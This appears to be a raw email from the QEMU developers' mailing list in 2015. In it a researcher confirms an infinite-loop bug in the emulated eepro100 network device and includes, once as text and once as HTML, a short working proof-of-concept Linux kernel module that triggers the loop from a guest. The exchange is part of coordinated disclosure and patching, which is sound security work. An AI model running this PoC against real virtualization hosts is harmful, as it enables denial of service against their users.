From mboxrd@z Thu Jan 1 00:00:00 1970 Received: from eggs.gnu.org ([2001:4830:134:3::10]:41550) by lists.gnu.org with esmtp (Exim 4.71) (envelope-from ) id 1ZzfBy-0001sw-2Z for qemu-devel@nongnu.org; Fri, 20 Nov 2015 01:29:07 -0500 Received: from Debian-exim by eggs.gnu.org with spam-scanned (Exim 4.71) (envelope-from ) id 1ZzfBw-0002ot-Vf for qemu-devel@nongnu.org; Fri, 20 Nov 2015 01:29:05 -0500 Received: from mail-wm0-x22e.google.com ([2a00:1450:400c:c09::22e]:33209) by eggs.gnu.org with esmtp (Exim 4.71) (envelope-from ) id 1ZzfBw-0002oo-Md for qemu-devel@nongnu.org; Fri, 20 Nov 2015 01:29:04 -0500 Received: by wmec201 with SMTP id c201so57605942wme.0 for ; Thu, 19 Nov 2015 22:29:04 -0800 (PST) MIME-Version: 1.0 In-Reply-To: References: <5620F082.5040007@redhat.com> <5625AEE0.7070908@redhat.com> <56397C1D.6070304@redhat.com> Date: Fri, 20 Nov 2015 14:29:04 +0800 Message-ID: From: Qinghao Tang Content-Type: multipart/alternative; boundary=001a114b4268ea951e0524f2fd14 Subject: Re: [Qemu-devel] [PATCH] eepro100: prevent an infinite loop over same command block List-Id: List-Unsubscribe: , List-Archive: List-Post: List-Help: List-Subscribe: , To: P J P Cc: Jason Wang , QEMU Developers --001a114b4268ea951e0524f2fd14 Content-Type: text/plain; charset=UTF-8 I think the patch can solve this vulnerability. I confirm that the loop exist , the poc code can prove that. #include #include #include #include #define PAGE_OFFSET 0x0C000000 MODULE_LICENSE("GPL"); static int hello_init(void) { void* pvirt; void* pphy; unsigned long* pdbal; unsigned long* tdt; unsigned short status; pvirt =kmalloc(0x100,GFP_KERNEL); memset(pvirt,0,0x100);//control the filed of eepro100_tx_t struct pphy=virt_to_phys(pvirt);//get physical address printk(KERN_ALERT "%08x\n",pvirt); printk(KERN_ALERT "%08x\n",pphy); outl(pphy,0xc004);//write the address outw(0x0060,0xc002); outl(0,0xc004);//write the offset outw(0x0010,0xc002); //enter action_command function return 0; } static void hello_exit(void) { printk(KERN_ALERT "goodbye,kernel\n"); } module_init(hello_init); module_exit(hello_exit); MODULE_AUTHOR("qinghao tang"); MODULE_DESCRIPTION("poc for eepro100 infinite loop vulnerability\n"); 2015-11-20 14:10 GMT+08:00 P J P : > Hello Qinghao, > > +-- On Fri, 20 Nov 2015, Qinghao Tang wrote --+ > | Currently what problem do you have? Perhaps I could provide more support. > > Could you please confirm if the proposed patch here fixes the issue. > Secondly there is uncertainty if the CB loop like Jason mentioned earlier > is > possible. > > | And please give this vulnerability a cve id. > > Yes I will; As soon as the patch is ready for upstream. > > Thank you. > -- > Prasad J Pandit / Red Hat Product Security Team > 47AF CE69 3A90 54AA 9045 1053 DD13 3D32 FE5B 041F > --001a114b4268ea951e0524f2fd14 Content-Type: text/html; charset=UTF-8 Content-Transfer-Encoding: quoted-printable
I think the patch can solve this vulnerability.
I = confirm that the loop exist , the poc code can prove that.

#include <linux/init.h>
#include <linux/module.h>
#inclu= de <linux/kernel.h>
#include <asm/io.h>
#define PAGE_OFFS= ET 0x0C000000
MODULE_LICENSE("GPL");
static int hello_init(= void)
{

=C2=A0 void* pvirt;
=C2=A0 void* pphy;
=C2=A0 unsig= ned long* pdbal;
=C2=A0 unsigned long* tdt;
=C2=A0 unsigned short sta= tus;
=C2=A0 pvirt =3Dkmalloc(0x100,GFP_KERNEL);
=C2=A0 memset(pvirt,= 0,0x100);//control the filed of eepro100_tx_t struct
=C2=A0 pphy=3Dvirt_= to_phys(pvirt);//get physical address
=C2=A0 printk(KERN_ALERT "%08= x\n",pvirt);
=C2=A0 printk(KERN_ALERT "%08x\n",pphy);
= =C2=A0 outl(pphy,0xc004);//write the address
=C2=A0 outw(0x0060,0xc002);=
=C2=A0 outl(0,0xc004);//write the offset
=C2=A0 outw(0x0010,0xc002);= //enter action_command function
=C2=A0=C2=A0
=C2=A0=C2=A0
retur= n 0;
}
static void hello_exit(void)
{
printk(KERN_ALERT "g= oodbye,kernel\n");
}
module_init(hello_init);
module_exit(hel= lo_exit);
MODULE_AUTHOR("qinghao tang");
MODULE_DESCRIPTION= ("poc for eepro100 infinite loop vulnerability= \n");

2015-11-20 14:10 GMT+08:00 P J P <ppandit@redhat.com>:
=C2=A0 Hello Qinghao,

+-- On Fri, 20 Nov 2015, Qinghao Tang wrote --+
| Currently what problem do you have? Perhaps I could prov= ide more support.

=C2=A0 Could you please confirm if the proposed patch here fixes the= issue.
Secondly there is uncertainty if the CB loop like Jason mentioned earlier i= s
possible.

| And please give this vulnerability a cve id.

=C2=A0 Yes I will; As soon as the patch is ready for upstream.

Thank you.
--
Prasad J Pandit / Red Hat Product Security Team
47AF CE69 3A90 54AA 9045 105= 3 DD13 3D32 FE5B 041F

--001a114b4268ea951e0524f2fd14--